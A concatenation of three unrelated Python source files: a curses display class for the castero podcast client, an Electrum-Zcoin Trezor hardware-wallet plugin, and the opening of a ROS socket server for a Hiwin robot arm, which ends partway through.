all aspects of the application's interface, including windows and menus. It
retrieves input from the user and performs corresponding actions.
"""
MIN_WIDTH = 20
MIN_HEIGHT = 8
INPUT_TIMEOUT = 1000 # 1 second
STATUS_TIMEOUT = 4 # multiple of INPUT_TIMEOUT
AVAILABLE_COLORS = {
'black': curses.COLOR_BLACK,
'blue': curses.COLOR_BLUE,
'cyan': curses.COLOR_CYAN,
'green': curses.COLOR_GREEN,
'magenta': curses.COLOR_MAGENTA,
'red': curses.COLOR_RED,
'white': curses.COLOR_WHITE,
'yellow': curses.COLOR_YELLOW,
'transparent': -1
}
KEY_MAPPING = {chr(i): i for i in range(256)}
KEY_MAPPING.update(
(name[4:], value) for name, value in vars(curses).items()
if name.startswith('KEY_')
)
KEY_MAPPING.update(
{
'ENTER': 10,
'SPACE': 32
}
)
AVAILABLE_PLAYERS = {}
def __init__(self, stdscr, database) -> None:
"""Initializes the object.
Args:
stdscr: a stdscr from curses.initscr()
database: a connected castero.Database
"""
self._stdscr = stdscr
self._database = database
self._parent_x = -1
self._parent_y = -1
self._perspectives = {}
self._active_perspective = 1
self._header_window = None
self._footer_window = None
self._queue = Queue(self)
self._download_queue = DownloadQueue(self)
self._status = ""
self._status_timer = self.STATUS_TIMEOUT
self._menus_valid = True
self._modified_episodes = []
# basic preliminary operations
self._stdscr.timeout(self.INPUT_TIMEOUT)
curses.start_color()
curses.noecho()
curses.curs_set(0)
curses.cbreak()
self._stdscr.keypad(True)
self.update_parent_dimensions()
self.create_color_pairs()
self._load_perspectives()
self._load_players()
self._create_windows()
self.create_menus()
def create_color_pairs(self) -> None:
"""Initializes color pairs used for the display.
Creates the following color pairs (foreground, background):
- 1: foreground, background
- 2: background, foreground
- 3: background_alt, foreground_alt
- 4: foreground_alt, background_alt
"""
assert Config["color_foreground"] in self.AVAILABLE_COLORS
assert Config["color_background"] in self.AVAILABLE_COLORS
assert Config["color_foreground_alt"] in self.AVAILABLE_COLORS
assert Config["color_background_alt"] in self.AVAILABLE_COLORS
if (self.AVAILABLE_COLORS[Config["color_background"]] == -1 or
self.AVAILABLE_COLORS[Config["color_background_alt"]] == -1):
curses.use_default_colors()
curses.init_pair(
1,
self.AVAILABLE_COLORS[Config["color_foreground"]],
self.AVAILABLE_COLORS[Config["color_background"]]
)
curses.init_pair(
2,
self.AVAILABLE_COLORS[Config["color_background"]],
self.AVAILABLE_COLORS[Config["color_foreground"]]
)
curses.init_pair(
3,
self.AVAILABLE_COLORS[Config["color_background_alt"]],
self.AVAILABLE_COLORS[Config["color_foreground_alt"]]
)
curses.init_pair(
4,
self.AVAILABLE_COLORS[Config["color_foreground_alt"]],
self.AVAILABLE_COLORS[Config["color_background_alt"]]
)
curses.init_pair(
5,
self.AVAILABLE_COLORS[Config["color_foreground_dim"]],
self.AVAILABLE_COLORS[Config["color_background"]]
)
def _load_perspectives(self) -> None:
"""Load instances of perspectives from the `perspectives` package.
"""
# load a list of modules names by manually detecting .py files
module_files = glob.glob(dirname(__file__) + "/perspectives/*.py")
module_names = [basename(f)[:-3] for f in module_files if isfile(f)]
for name in module_names:
p_mod = importlib.import_module("castero.perspectives.%s" % name)
p_cls = getattr(
p_mod,
dir(p_mod)[[cls.lower() == name
for cls in dir(p_mod)].index(True)])
inst = p_cls(self)
self._perspectives[inst.ID] = inst
def _load_players(self) -> None:
"""Load player classes from the `players` package.
"""
# load a list of modules names by manually detecting .py files
module_files = glob.glob(dirname(__file__) + "/players/*.py")
module_names = [basename(f)[:-3] for f in module_files if isfile(f)]
for name in module_names:
p_mod = importlib.import_module("castero.players.%s" % name)
p_cls = getattr(
p_mod,
dir(p_mod)[[cls.lower() == name
for cls in dir(p_mod)].index(True)])
self.AVAILABLE_PLAYERS[p_cls.NAME] = p_cls
def _create_windows(self) -> None:
"""Creates and sets basic parameters for the windows.
If the windows already exist when this method is run, this method will
delete them and create new ones.
"""
# delete old windows if they exist
if self._header_window is not None:
del self._header_window
self._header_window = None
if self._footer_window is not None:
del self._footer_window
self._footer_window = None
# create windows
self._header_window = curses.newwin(2, self._parent_x,
0, 0)
self._footer_window = curses.newwin(2, self._parent_x,
self._parent_y - 2, 0)
# set window attributes
self._header_window.attron(curses.color_pair(4))
self._footer_window.attron(curses.color_pair(4))
# create windows for all perspectives
for perspective_id in self._perspectives:
self._perspectives[perspective_id].create_windows()
def create_menus(self) -> None:
"""Creates the menus used in each window.
Windows which have menus should be created prior to running this method
(using _create_windows).
"""
for perspective_id in self._perspectives:
self._perspectives[perspective_id].create_menus()
def show_help(self) -> None:
"""Show the help screen.
This method takes over the main loop, displaying the screen until a key
is pressed. This means that typical loop actions, including checking
the state of the current player, will not run while this screen is up.
"""
self.clear()
self._stdscr.refresh()
padding_yx = (1, 4)
help_window = curses.newwin(self._parent_y, self._parent_x, 0, 0)
help_window.attron(curses.A_BOLD)
# display lines from __help__
help_lines = \
castero.__help__.split('\n')[:self._parent_y - padding_yx[0] - 1]
help_lines.append("Press any key to exit this screen.")
for i in range(len(help_lines)):
help_window.addstr(i + padding_yx[0], padding_yx[1],
help_lines[i][:self._parent_x - padding_yx[1]])
help_window.refresh()
# simply wait until any key is pressed (temporarily disable timeout)
self._stdscr.timeout(-1)
self._stdscr.getch()
self._stdscr.timeout(self.INPUT_TIMEOUT)
self.clear()
def display(self) -> None:
"""Draws all windows and sub-features, including titles and borders.
"""
# check if the screen size has changed
self.update_parent_dimensions()
# check to see if menu contents have been invalidated
if not self.menus_valid:
for perspective_id in self._perspectives:
self._perspectives[perspective_id].update_menus()
self.menus_valid = True
# add header
playing_str = castero.__title__
if self._queue.first is not None:
state = self._queue.first.state
playing_str = ["Stopped", "Playing", "Paused"][state] + \
": %s" % self._queue.first.title
if self._queue.length > 1:
playing_str += " (+%d in queue)" % (self._queue.length - 1)
if helpers.is_true(Config["right_align_time"]):
playing_str += ("[%s]" % self._queue.first.time_str).rjust(
self._header_window.getmaxyx()[1] - len(playing_str))
else:
playing_str += " [%s]" % self._queue.first.time_str
self._header_window.attron(curses.A_BOLD)
self._header_window.addstr(0, 0, " " * self._parent_x)
self._header_window.addstr(0, 0, playing_str)
# add footer
footer_str = ""
if self._status == "" and not \
helpers.is_true(Config["disable_default_status"]):
feeds = self.database.feeds()
if len(feeds) > 0:
total_feeds = len(feeds)
lengths_of_feeds = \
[len(self.database.episodes(feed)) for feed in feeds]
total_episodes = sum(lengths_of_feeds)
median_episodes = helpers.median(lengths_of_feeds)
footer_str += "Found %d feeds with %d total episodes (avg." \
" %d episodes, med. %d)" % (
total_feeds,
total_episodes,
total_episodes / total_feeds,
median_episodes
)
else:
footer_str += "No feeds added"
else:
footer_str = self._status
if footer_str != "":
footer_str += " -- Press %s for help" % Config["key_help"]
self._footer_window.attron(curses.A_BOLD)
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
footer_str = footer_str[:self._footer_window.getmaxyx()[1] - 1]
self._footer_window.addstr(1, 0, footer_str)
# add window borders
self._header_window.hline(1, 0,
0, self._header_window.getmaxyx()[1])
self._footer_window.hline(0, 0,
0, self._footer_window.getmaxyx()[1])
# update display for current perspective
self._perspectives[self._active_perspective].display()
def _get_active_perspective(self) -> Perspective:
"""Retrieve the active/visible Perspective.
"""
return self._perspectives[self._active_perspective]
def _change_active_perspective(self, perspective_id) -> None:
"""Changes _active_perspective to the given perspective.
Args:
perspective_id: the ID of the perspective to change to
"""
assert perspective_id in self._perspectives
self._active_perspective = perspective_id
self._perspectives[perspective_id].made_active()
self.clear()
def _get_input_str(self, prompt) -> str:
"""Prompts the user for input and returns the resulting string.
This method assumes that all input strings will be obtained in the
footer window.
Args:
prompt: a string to inform the user of what they need to enter
Returns:
str: the user's input
"""
assert self._footer_window is not None
assert isinstance(prompt, str)
curses.curs_set(1)
self._stdscr.timeout(-1) # disable timeouts while waiting for entry
# display input prompt
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
self._footer_window.addstr(1, 0, prompt)
entry_pad = curses.newpad(1, 999)
current_x = 0
scroll_x = 0
input_char = None
while input_char not in [curses.KEY_ENTER, 10]:
if input_char is not None:
# manually handle backspace
if input_char in [curses.KEY_BACKSPACE, 127]:
if current_x > 0:
entry_pad.delch(0, current_x - 1)
current_x -= 1
if scroll_x > 0:
scroll_x -= 1
else:
# scroll the input pad if necessary
if current_x + len(prompt) > \
self._footer_window.getmaxyx()[1] - 1:
scroll_x += 1
# add the entered character to the pad
entry_pad.addch(0, current_x, input_char)
current_x += 1
# display current portion of pad
entry_pad.refresh(0, scroll_x,
self._parent_y - 1, len(prompt),
self._parent_y - 1,
self._footer_window.getmaxyx()[1] - 1)
# get the next input character
input_char = self._footer_window.getch()
self._stdscr.timeout(self.INPUT_TIMEOUT)
self._footer_window.clear()
curses.curs_set(0)
return entry_pad.instr(0, 0, entry_pad.getmaxyx()[1]) \
.decode('utf-8').strip()
def _get_y_n(self, prompt) -> bool:
"""Prompts the user for a yes or no (y/n) input.
Args:
prompt: a string to inform the user of what they need to enter
Returns:
bool: true if the user presses y, false otherwise
"""
assert self._footer_window is not None
assert isinstance(prompt, str)
curses.echo()
curses.curs_set(1)
self._footer_window.addstr(
1, 0, " " * (self._footer_window.getmaxyx()[1] - 1)
)
self._footer_window.addstr(1, 0, prompt)
char = self._footer_window.getch()
self._footer_window.clear()
curses.curs_set(0)
curses.noecho()
return char == ord('y')
def handle_input(self, c) -> bool:
"""Performs action corresponding to the user's input.
Args:
c: the input character
Returns:
bool: whether or not the application should continue running
"""
for perspective_id in self._perspectives:
if c == self.KEY_MAPPING[str(perspective_id)]:
self._change_active_perspective(perspective_id)
return self._get_active_perspective().handle_input(c)
def add_feed(self) -> None:
"""Prompt the user for a feed and add it, if possible.
"""
path = self._get_input_str("Enter the URL or path of the feed: ")
try:
# assume urls have http in them
if "http" in path:
feed = Feed(url=path)
else:
feed = Feed(file=path)
if feed.validated:
self.database.replace_feed(feed)
self.database.replace_episodes(feed, feed.parse_episodes())
self.menus_valid = False
self.change_status("Feed '%s\' successfully added" % str(feed))
except FeedError as e:
if isinstance(e, FeedLoadError):
self.change_status(
"FeedLoadError: %s" % str(e)
)
elif isinstance(e, FeedDownloadError):
self.change_status(
"FeedDownloadError: %s" % str(e)
)
elif isinstance(e, FeedParseError):
self.change_status(
"FeedParseError: %s" % str(e)
)
elif isinstance(e, FeedStructureError):
self.change_status(
"FeedStructureError: %s" % str(e)
)
else:
self.change_status(
"FeedError [ambiguous]: %s" % str(e)
)
def delete_feed(self, feed: Feed) -> None:
"""Deletes the given feed from the database.
If the delete_feed_confirmation config option is true, this method will
first ask for y/n confirmation before deleting the feed.
Deleting a feed also deletes all downloaded/saved episodes.
Args:
feed: the Feed to delete, which can be None
"""
if feed is not None:
should_delete = True
if helpers.is_true(Config["delete_feed_confirmation"]):
should_delete = self._get_y_n(
"Are you sure you want to delete this feed? (y/n): "
)
if should_delete:
self.database.delete_feed(feed)
self.menus_valid = False
self.change_status("Feed successfully deleted")
def reload_feeds(self) -> None:
"""Reloads the users' feeds.
If the total number of feeds is >= the reload_feeds_threshold config
option, this method will first ask for y/n confirmation.
This method starts the reloading in a new un-managed thread.
"""
should_reload = True
if len(self.database.feeds()) >= int(Config["reload_feeds_threshold"]):
should_reload = self._get_y_n(
"Are you sure you want to reload all of your feeds?"
" (y/n): "
)
if should_reload:
t = threading.Thread(target=self.database.reload, args=[self])
t.start()
def save_episodes(self, feed=None, episode=None) -> None:
"""Save a feed or episode.
If the user is saving an episode and the episode is already saved, this
method will instead ask the user if they would like to delete the
downloaded episode. However, if the user is saving a feed, there is no
prompt to delete episodes, even if some are downloaded. In this case,
downloaded episodes are simply skipped.
Exactly one of either feed or episode must be given.
Args:
feed: (optional) a feed to download all episodes of
episode: (optional) an episode to download or delete
"""
assert (feed is None or episode is None) and (feed is not episode)
if feed is not None:
for episode in self.database.episodes(feed):
if not episode.downloaded:
self._download_queue.add(episode)
else:
if episode.downloaded:
should_delete = self._get_y_n(
"Are you sure you want to delete the downloaded"
" episode? (y/n): ")
if should_delete:
episode.delete(self)
else:
self._download_queue.add(episode)
def clear(self) -> None:
"""Clear the screen.
"""
self._stdscr.clear()
def refresh(self) -> None:
"""Refresh the screen and all windows in all perspectives.
"""
self._stdscr.refresh()
for perspective_id in self._perspectives:
self._perspectives[perspective_id].refresh()
self._header_window.refresh()
self._footer_window.refresh()
def terminate(self) -> None:
"""Set console settings to their normal state.
This method does not, by itself, cause the application to exit. Nor
does it even cause the input loop to end. It should simply be seen as
a "wrapping up" method for any actions which need to be performed
before the object is destroyed.
"""
self._queue.stop()
curses.nocbreak()
self._stdscr.keypad(False)
curses.echo()
curses.endwin()
def update_parent_dimensions(self) -> None:
"""Update _parent_x and _parent_y to the size of the console.
"""
current_y, current_x = self._stdscr.getmaxyx()
if current_y != self._parent_y or current_x != self._parent_x:
self._parent_y, self._parent_x = current_y, current_x
self._create_windows()
self.menus_valid = False
self.refresh()
if self._parent_y < self.MIN_HEIGHT:
raise DisplaySizeError("Display height is too small")
if self._parent_x < self.MIN_WIDTH:
raise DisplaySizeError("Display width is too small")
def getch(self) -> int:
"""Gets an input character from the user.
This method returns after at most INPUT_TIMEOUT ms.
Returns:
int: the character entered by the user, or -1
"""
char = self._stdscr.getch()
return char
def change_status(self, status) -> None:
"""Changes the status message displayed in the footer.
Args:
status: the status message to display
"""
assert isinstance(status, str)
self._status = status
self._status_timer = self.STATUS_TIMEOUT
def update(self) -> None:
"""Updates all actively tracked components of this object.
Should be called by the main loop after every input or input timeout.
"""
# have the queue check if it needs to go to the next player
self._queue.update()
# check the status of any downloads
try:
self._download_queue.update()
except OSError as e:
self.change_status("OSError: %s" % str(e))
return
# update the status timer
# If the user is not doing anything, the status message will take
# INPUT_TIMEOUT * STATUS_TIMEOUT ms to be cleared. However, if the user
# is performing inputs (i.e. traversing a menu) the message may be
# cleared much quicker, since it will go away in STATUS_TIMEOUT
# keypresses. However, this seems reasonable, since if the user is
# actively controlling the client and not pausing to read the message,
# they probably don't care about it anyway.
if self._status_timer > 0:
self._status_timer -= 1
if self._status_timer <= 0:
# status_timer should be reset during the next change_status()
self._status = ""
# write any episode modifications to the database
if len(self._modified_episodes) > 0:
for episode in self._modified_episodes:
self.database.replace_episode(episode._feed, episode)
self.menus_valid = False
self._modified_episodes = []
@property
def parent_x(self) -> int:
"""int: the width of the parent screen, in characters"""
return self._parent_x
@property
def parent_y(self) -> int:
"""int: the height of the parent screen, in characters"""
return self._parent_y
@property
def database(self) -> Database:
"""Database: the user's database"""
return self._database
@property
def perspectives(self) -> dict:
"""dict: the loaded Perspective's with id:perspective pairs"""
return self._perspectives
@property
def queue(self) -> Queue:
"""Queue: the Queue of Player's"""
return self._queue
@property
def menus_valid(self) -> bool:
"""bool: whether the menu contents are valid (!need_to_be_updated)"""
return self._menus_valid
@menus_valid.setter
def menus_valid(self, menus_valid) -> None:
self._menus_valid = menus_valid
@property
def modified_episodes(self) -> List[Episode]:
"""List[Episode]: database episodes to save on the next update"""
return self._modified_episodes
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from electrum_xzc.util import bfh, bh2u
from electrum_xzc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from electrum_xzc.i18n import _
from electrum_xzc.plugins import BasePlugin
from electrum_xzc.transaction import deserialize
from electrum_xzc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Zcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_gen = wallet.keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
Hiwin_RT605_ArmCommand_Socket_20190627175408.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
